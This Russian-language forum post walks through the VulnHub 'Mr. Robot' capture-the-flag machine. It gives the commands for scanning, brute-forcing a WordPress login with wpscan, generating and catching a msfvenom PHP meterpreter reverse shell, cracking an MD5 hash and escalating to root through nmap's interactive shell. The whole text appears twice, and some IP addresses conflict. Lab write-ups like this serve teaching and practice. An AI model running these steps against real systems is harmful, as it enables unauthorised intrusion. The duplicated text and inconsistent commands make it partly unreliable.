Vander
12.09.2016, 16:14
Привет всем! В этой статье речь пойдет о CFT Challenge.
Capture the Flag (CTF сокращенно) — это хакерские соревнования. Суть игры заключается в том, что в распоряжение командам дается система с набором уязвимых приложений-сервисов. Основная задача – проанализировать систему, найти уязвимости, закрыть их у себя и как можно быстрее, используя найденные уязвимости, взломать системы соперника. В некоторых играх дополнительные очки начисляются за описание уязвимостей в бюллетенях безопасности.
Взлом такой системы и будет описан ниже. Проникновение осуществляется в рамках уязвимой системы Mr. Robot. Она основана на популярном телесериале, мистер Робот, и имеет три ключа, спрятанные в разных местах. Основная цель состоит в том, чтобы найти все три жетона скрытых в системе. Каждый последующий ключ найти сложнее предыдущего. Целевая система имеет ряд уязвимостей, которые не так уж и сложно обнаружить. Степень подготовки участника может быть на начальном – среднем уровне.
Приступим.
https://forum.antichat.xyz/attachments/28940807/img_2001f0d518.png
Скачиваем систему Mr.Robot отсюда - https://www.vulnhub.com/entry/mr-robot-1,151/
В качестве дистрибутива для взлома, мной будет использоваться Kali Linux Rolling.
Запускаем Mr. Robot, например в VM Virtual Box, затем, находим ее адрес в нашей сети. Используем утилиту netdiscover.
netdiscover – активный-пассивный сканер-разведчик адресов беспроводных сетей без DHCP сервера.
> netdiscover
https://forum.antichat.xyz/attachments/28940807/img_c236d71115.png
Получаем информацию обо всех адресах в нашей сети. Наш целевой хост это– 192.168.0.105,давайте просканируем его.
Выбираем агрессивный метод сканирования (-А).
> nmap –А 192.168.0.105
https://forum.antichat.xyz/attachments/28940807/img_bcee04528b.png
Результат сканирования показал нам открытые порты: 22, 80, 443. Попробуем постучаться на 80-й порт используя браузер.
https://forum.antichat.xyz/attachments/28940807/img_276fc4c78f.png
Мы убеждаемся в том, что цель выбрана правильно, работаем дальше.
Далее мы будем использовать nikto.
Nikto — утилита для обнаружения файлов, которые копируются при установке сервера в папки по умолчанию. Помимо этого она тестирует web- и CGI-серверы на предмет безопасного использования. Во время работы сканер осуществляет многочисленные запросы на удаленный сервер, что в некоторых случаях может вызвать его падение, поскольку такой же принцип применяется в DoS-атаках.
Она поможет нам собрать информацию о файлах и других важных вещах, которые мы должны знать о нашей цели. Вводим:
> nikto
https://forum.antichat.xyz/attachments/28940807/img_21cc7b261d.png
Исходя из полученной информации, видим, что на сервере есть файл с именем robots.txt. Анализом его мы и займемся. Красным я выделил несколько важных моментов, которые в дальнейшем нам помогут.
Открываем robots.txtв браузере:
https://forum.antichat.xyz/attachments/28940807/img_db6784f4d2.png
Затем открываем файл key-1-of-3.txt и получаем первый из трех ключей.
https://forum.antichat.xyz/attachments/28940807/img_4ab4b794d9.png
Следующее, что должно нас заинтересовать, это файл под названием fsocity.dic. Открываем его в браузере, затем сохраняем себе.
Посмотрим, что находится внутри словаря:
https://forum.antichat.xyz/attachments/28940807/img_1c146b4317.png
Теперь мы знаем, что обладая логином и паролем, мы могли бы получить доступ к цели. Перебирая имена пользователей, при попытке залогиниться в форме -192.168.0.105/wp-login.php мы всегда получали ошибку, что имени пользователя не существует . Но когда мы использовали имя elliot мы получили сообщение об ошибке, что введен неверный пароль.
И нам точно известно, что elliot правильное имя пользователя и мы просто должны найти пароль для него.
Будем надеяться, что пароль находиться в том же словаре, где обнаружился логин. Попробуем использовать утилиту wpscan, чтобы найти его.
WPScan — это сканер уязвимостей WordPress. Предустановлен.
Пишем:
> wpscan –url http://192.168.0.102 –wordlist /root/Desktop/fsocity.dic –username elliot
Где:
- wpscan -> запускает WPScan
- url -> обозначает URL по которому будет работать WPScan - http://192.168.0.105 -> наш URL
- wordlist -> обозначает путь к файлу словаря
- username -> обозначает имя пользователя
- elliot -> имя пользователя
Обработка занимает некоторое время, запасаемся терпением.
https://forum.antichat.xyz/attachments/28940807/img_f2a5d5ff8d.png
В результате получаем пароль пользователя elliot.
Для тех кому ожидание в тягость, предлагаю способ, значительно ускоряющий получение искомого пароля. Обратим внимание на файл license.txt. В нем содержится хеш пароля Эллиота. Найти его поможет встроенный в Firefox плагин firebug.
Firebug — расширение для браузера Firefox, являющееся консолью, отладчиком, и DOM-инспектором JavaScript, DHTML, CSS, XMLHttpRequest. Firebug показывает в консоли вызвавшую ошибку функцию, стек вызовов функций, вызвавших эту ошибку. Он предупреждает, что правило CSS или метод/свойство JavaScript, которое вы пытаетесь использовать, не существует.
Текст скрыт в нижней части страницы в заголовке
https://forum.antichat.xyz/attachments/28940807/img_6463ed8802.png
Попробуем расшифровать его в OWASP Zap, с параметрами base64:
OWASP Zed прокси Attack (ZAP)- это простой в использовании интегрированный инструмент для тестирования на проникновение, а также для поиска уязвимостей в web-приложениях. Программа предназначена для пользователей имеющих опыт работы в сфере информационной безопасности, таких как разработчики и функциональные тестеры. Программа будет полезным дополнением для набора инструментов разработчика.
https://forum.antichat.xyz/attachments/28940807/img_f0edf791a9.png
Пароль у нас в руках. Логинимся по адресу 192.168.0.105\wp-login.php используя полученные данные.
Теперь, когда мы вошли в систему, пришло время сгенерировать код полезной нагрузки и загрузить его в нашу цель. Вернемся в консоль Kali, пишем следующее:
> msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.105 lport=4444 -f raw
https://forum.antichat.xyz/attachments/28940807/img_92ac6481a8.png
Полученный код копируем от use exploit/multi/handler
> set payload php/meterpreter/reverse_tcp
> set lhost 192.168.0.105
> set lport 4444
> exploit
https://forum.antichat.xyz/attachments/28940807/img_7d9ee63f97.png
Открываем путь к шаблону в браузере как показано на скрине:
https://forum.antichat.xyz/attachments/28940807/img_0787c28d19.png
Жмем Enter и получаем открывшуюся сессию meterpreter.
Переходим в шелл и создаем python – скрипт, который позволит получить нам доступ к псевдо-терминалу pty. Затем выполняем его.
> echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asd.py
> python /tmp/asd.py
https://forum.antichat.xyz/attachments/28940807/img_1a6d11aab2.png
После выполненного выше, нам необходимо получить больше информацию о пользователе.
> ls -lsa (получаем информацию о текущем каталоге)
> cd home (переходим в домашний каталог)
> ls -lsa
Нашей целью является пользователь под ником robot, выполняем здесь команду:
> cd robot (переходим в каталог robot)
https://forum.antichat.xyz/attachments/28940807/img_f4211d0e14.png
> ls -lsa
Здесь находится два интересующих нас файла, первый это текстовый документ содержащий ключ, а второй несет в себе пароль зашифрованный алгоритмом хеширования MD5.
Попробуем посмотреть содержимое файла key-2-of-3.txt.
> cat key-2-of-3.txt
https://forum.antichat.xyz/attachments/28940807/img_bd5ea9cdf3.png
В доступе нам отказано. Давайте попробуем открыть файл MD5 и для этого вводим:
> cat password.raw-md5
Выполнение вышеуказанной команды выдаст значение MD5 (хэш-значение) пароля, как вы можете увидеть ниже:
https://forum.antichat.xyz/attachments/28940807/img_e3e14e01bd.png
Мы будем использовать md5cracker.org (online md5 value cracker), чтобы взломать хеш MD5. Введите хеш MD5, в текстовое поле и нажмите кнопку
Crack/encrypt.
https://forum.antichat.xyz/attachments/28940807/img_a64d07f4ad.png
В результате получаем расшифрованное значение MD5:
https://forum.antichat.xyz/attachments/28940807/img_abe3e94631.png
В терминале, пробуем переключиться на пользователя robot, используя полученный пароль.
> su robot
> ls –lsa
Смотрим содержимое файла:
> cat key-2-of-3.txt
https://forum.antichat.xyz/attachments/28940807/img_2f2c98e9a9.png
Получаем второй ключ!
Далее введите следующую команду:
> nmap
Подробнее об этом сканере можно узнать здесь - https://codeby.net/blogs/kniga-po-nmap-na-russkom/
Nmap поддерживает опцию, которая называется "интерактивная". С помощью этой опции, пользователи получили возможность выполнять команды оболочки с помощью nmap "shell" (интерактивная оболочка).
> nmap –interactive
https://forum.antichat.xyz/attachments/28940807/img_9b04f697be.png
Далее по порядку выполняем:
> !sh
> id(узнаем ID пользователей)
> cd /root (перейдем в каталог root)
https://forum.antichat.xyz/attachments/28940807/img_fb0cf6c4fe.png
Выполняем команду:
> ls –lsa
Видим, что здесь находится третий, последний ключ.
> cat key-3-of-3.txt
https://forum.antichat.xyz/attachments/28940807/img_0b6ec14fe4.png
Вот и все, все три ключа собраны, задача выполнена. Mr. Robot был успешно взломан. Еще хочу добавить, что это не единственный путь получения ключей, было бы отлично узнать о новых способах в комментариях или в новой теме.
Capture the Flag (CTF сокращенно) — это хакерские соревнования. Суть игры заключается в том, что в распоряжение командам дается система с набором уязвимых приложений-сервисов. Основная задача – проанализировать систему, найти уязвимости, закрыть их у себя и как можно быстрее, используя найденные уязвимости, взломать системы соперника. В некоторых играх дополнительные очки начисляются за описание уязвимостей в бюллетенях безопасности.
Взлом такой системы и будет описан ниже. Проникновение осуществляется в рамках уязвимой системы Mr. Robot. Она основана на популярном телесериале, мистер Робот, и имеет три ключа, спрятанные в разных местах. Основная цель состоит в том, чтобы найти все три жетона скрытых в системе. Каждый последующий ключ найти сложнее предыдущего. Целевая система имеет ряд уязвимостей, которые не так уж и сложно обнаружить. Степень подготовки участника может быть на начальном – среднем уровне.
Приступим.
https://forum.antichat.xyz/attachments/28940807/img_2001f0d518.png
Скачиваем систему Mr.Robot отсюда - https://www.vulnhub.com/entry/mr-robot-1,151/
В качестве дистрибутива для взлома, мной будет использоваться Kali Linux Rolling.
Запускаем Mr. Robot, например в VM Virtual Box, затем, находим ее адрес в нашей сети. Используем утилиту netdiscover.
netdiscover – активный-пассивный сканер-разведчик адресов беспроводных сетей без DHCP сервера.
> netdiscover
https://forum.antichat.xyz/attachments/28940807/img_c236d71115.png
Получаем информацию обо всех адресах в нашей сети. Наш целевой хост это– 192.168.0.105,давайте просканируем его.
Выбираем агрессивный метод сканирования (-А).
> nmap –А 192.168.0.105
https://forum.antichat.xyz/attachments/28940807/img_bcee04528b.png
Результат сканирования показал нам открытые порты: 22, 80, 443. Попробуем постучаться на 80-й порт используя браузер.
https://forum.antichat.xyz/attachments/28940807/img_276fc4c78f.png
Мы убеждаемся в том, что цель выбрана правильно, работаем дальше.
Далее мы будем использовать nikto.
Nikto — утилита для обнаружения файлов, которые копируются при установке сервера в папки по умолчанию. Помимо этого она тестирует web- и CGI-серверы на предмет безопасного использования. Во время работы сканер осуществляет многочисленные запросы на удаленный сервер, что в некоторых случаях может вызвать его падение, поскольку такой же принцип применяется в DoS-атаках.
Она поможет нам собрать информацию о файлах и других важных вещах, которые мы должны знать о нашей цели. Вводим:
> nikto
https://forum.antichat.xyz/attachments/28940807/img_21cc7b261d.png
Исходя из полученной информации, видим, что на сервере есть файл с именем robots.txt. Анализом его мы и займемся. Красным я выделил несколько важных моментов, которые в дальнейшем нам помогут.
Открываем robots.txtв браузере:
https://forum.antichat.xyz/attachments/28940807/img_db6784f4d2.png
Затем открываем файл key-1-of-3.txt и получаем первый из трех ключей.
https://forum.antichat.xyz/attachments/28940807/img_4ab4b794d9.png
Следующее, что должно нас заинтересовать, это файл под названием fsocity.dic. Открываем его в браузере, затем сохраняем себе.
Посмотрим, что находится внутри словаря:
https://forum.antichat.xyz/attachments/28940807/img_1c146b4317.png
Теперь мы знаем, что обладая логином и паролем, мы могли бы получить доступ к цели. Перебирая имена пользователей, при попытке залогиниться в форме -192.168.0.105/wp-login.php мы всегда получали ошибку, что имени пользователя не существует . Но когда мы использовали имя elliot мы получили сообщение об ошибке, что введен неверный пароль.
И нам точно известно, что elliot правильное имя пользователя и мы просто должны найти пароль для него.
Будем надеяться, что пароль находиться в том же словаре, где обнаружился логин. Попробуем использовать утилиту wpscan, чтобы найти его.
WPScan — это сканер уязвимостей WordPress. Предустановлен.
Пишем:
> wpscan –url http://192.168.0.102 –wordlist /root/Desktop/fsocity.dic –username elliot
Где:
- wpscan -> запускает WPScan
- url -> обозначает URL по которому будет работать WPScan - http://192.168.0.105 -> наш URL
- wordlist -> обозначает путь к файлу словаря
- username -> обозначает имя пользователя
- elliot -> имя пользователя
Обработка занимает некоторое время, запасаемся терпением.
https://forum.antichat.xyz/attachments/28940807/img_f2a5d5ff8d.png
В результате получаем пароль пользователя elliot.
Для тех кому ожидание в тягость, предлагаю способ, значительно ускоряющий получение искомого пароля. Обратим внимание на файл license.txt. В нем содержится хеш пароля Эллиота. Найти его поможет встроенный в Firefox плагин firebug.
Firebug — расширение для браузера Firefox, являющееся консолью, отладчиком, и DOM-инспектором JavaScript, DHTML, CSS, XMLHttpRequest. Firebug показывает в консоли вызвавшую ошибку функцию, стек вызовов функций, вызвавших эту ошибку. Он предупреждает, что правило CSS или метод/свойство JavaScript, которое вы пытаетесь использовать, не существует.
Текст скрыт в нижней части страницы в заголовке
https://forum.antichat.xyz/attachments/28940807/img_6463ed8802.png
Попробуем расшифровать его в OWASP Zap, с параметрами base64:
OWASP Zed прокси Attack (ZAP)- это простой в использовании интегрированный инструмент для тестирования на проникновение, а также для поиска уязвимостей в web-приложениях. Программа предназначена для пользователей имеющих опыт работы в сфере информационной безопасности, таких как разработчики и функциональные тестеры. Программа будет полезным дополнением для набора инструментов разработчика.
https://forum.antichat.xyz/attachments/28940807/img_f0edf791a9.png
Пароль у нас в руках. Логинимся по адресу 192.168.0.105\wp-login.php используя полученные данные.
Теперь, когда мы вошли в систему, пришло время сгенерировать код полезной нагрузки и загрузить его в нашу цель. Вернемся в консоль Kali, пишем следующее:
> msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.105 lport=4444 -f raw
https://forum.antichat.xyz/attachments/28940807/img_92ac6481a8.png
Полученный код копируем от use exploit/multi/handler
> set payload php/meterpreter/reverse_tcp
> set lhost 192.168.0.105
> set lport 4444
> exploit
https://forum.antichat.xyz/attachments/28940807/img_7d9ee63f97.png
Открываем путь к шаблону в браузере как показано на скрине:
https://forum.antichat.xyz/attachments/28940807/img_0787c28d19.png
Жмем Enter и получаем открывшуюся сессию meterpreter.
Переходим в шелл и создаем python – скрипт, который позволит получить нам доступ к псевдо-терминалу pty. Затем выполняем его.
> echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asd.py
> python /tmp/asd.py
https://forum.antichat.xyz/attachments/28940807/img_1a6d11aab2.png
После выполненного выше, нам необходимо получить больше информацию о пользователе.
> ls -lsa (получаем информацию о текущем каталоге)
> cd home (переходим в домашний каталог)
> ls -lsa
Нашей целью является пользователь под ником robot, выполняем здесь команду:
> cd robot (переходим в каталог robot)
https://forum.antichat.xyz/attachments/28940807/img_f4211d0e14.png
> ls -lsa
Здесь находится два интересующих нас файла, первый это текстовый документ содержащий ключ, а второй несет в себе пароль зашифрованный алгоритмом хеширования MD5.
Попробуем посмотреть содержимое файла key-2-of-3.txt.
> cat key-2-of-3.txt
https://forum.antichat.xyz/attachments/28940807/img_bd5ea9cdf3.png
В доступе нам отказано. Давайте попробуем открыть файл MD5 и для этого вводим:
> cat password.raw-md5
Выполнение вышеуказанной команды выдаст значение MD5 (хэш-значение) пароля, как вы можете увидеть ниже:
https://forum.antichat.xyz/attachments/28940807/img_e3e14e01bd.png
Мы будем использовать md5cracker.org (online md5 value cracker), чтобы взломать хеш MD5. Введите хеш MD5, в текстовое поле и нажмите кнопку
Crack/encrypt.
https://forum.antichat.xyz/attachments/28940807/img_a64d07f4ad.png
В результате получаем расшифрованное значение MD5:
https://forum.antichat.xyz/attachments/28940807/img_abe3e94631.png
В терминале, пробуем переключиться на пользователя robot, используя полученный пароль.
> su robot
> ls –lsa
Смотрим содержимое файла:
> cat key-2-of-3.txt
https://forum.antichat.xyz/attachments/28940807/img_2f2c98e9a9.png
Получаем второй ключ!
Далее введите следующую команду:
> nmap
Подробнее об этом сканере можно узнать здесь - https://codeby.net/blogs/kniga-po-nmap-na-russkom/
Nmap поддерживает опцию, которая называется "интерактивная". С помощью этой опции, пользователи получили возможность выполнять команды оболочки с помощью nmap "shell" (интерактивная оболочка).
> nmap –interactive
https://forum.antichat.xyz/attachments/28940807/img_9b04f697be.png
Далее по порядку выполняем:
> !sh
> id(узнаем ID пользователей)
> cd /root (перейдем в каталог root)
https://forum.antichat.xyz/attachments/28940807/img_fb0cf6c4fe.png
Выполняем команду:
> ls –lsa
Видим, что здесь находится третий, последний ключ.
> cat key-3-of-3.txt
https://forum.antichat.xyz/attachments/28940807/img_0b6ec14fe4.png
Вот и все, все три ключа собраны, задача выполнена. Mr. Robot был успешно взломан. Еще хочу добавить, что это не единственный путь получения ключей, было бы отлично узнать о новых способах в комментариях или в новой теме.